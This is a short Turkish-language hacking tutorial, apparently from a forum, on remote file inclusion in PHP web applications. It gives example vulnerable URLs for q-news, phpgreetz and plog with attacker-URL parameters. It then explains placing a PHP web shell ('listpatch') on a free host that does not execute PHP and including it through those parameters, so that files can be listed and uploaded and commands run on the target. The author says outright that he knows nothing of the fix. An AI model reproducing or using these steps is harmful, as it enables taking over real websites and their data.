Açigin neden olustugu ve nasil kapatalicagi hakkinda PHP bilmedigim için bilgi sahibi degilim.

Exp. Bölümünde yayinladigim güvenlik açiklarinin içinde, Inclusion açiklari da mevcuttur. Oradan örneklemek gerekirse, örnek bir açigin linki;

http://www.example.com/path_to_qnews/q-news.php?id=http://attacker_url]

http://www.example.com/path_to_phpgreetz/content.php?content=http://attacker_url]

http://www.example.com/PATH/admin/plog-admin-functions.php?configbasedir=http://www.example.com/code]

Sekilde görüldügü gibi bir kullanimlari vardir. attacker_url veya example.com yazan yerlere kendi istedigimiz seyleri yazarak siteye bazi seyleri yaptirabiliyoruz. Örnegin dosya upload edebiliriz, bazi komutlari çalistirabiliriz (dizindeki dosyalari listeleme gibi) ya da uzaktan listpatch (ASP`deki FSO) çalistirabiliriz. Asil önemli nokta bu iste :)

Listpatch`i php destekleyen ama kodlari compile etmeyen bir hosta atacagiz. Yani kodlar attigimiz hostta çalisirsa, include edecegimiz hostta görevini görmeyecektir. http://hometown.aol.com/ buradan host alip, PHP Listpatch`imizi içeriye atiyoruz.

http://hometown.aol.com/nickiniz/listpatch.php seklinde hallettikten sonra, File Inc. açigi olan yerlerde çalistiriyoruz.

Örnegin;

http://www.example.com/path_to_qnews/q-news.php?id=http://attacker_url] burada id den sonraki yeri degistiriyoruz. http://www.example.com/path_to_qnews/q-news.php?id=http://hometown.aol.com/nickiniz/listpatch.php seklinde linki browser`a yazip çalistirdigimizda, sanki o siteye listpatch yedirmisiz gibi islem yapabiliyoruz :)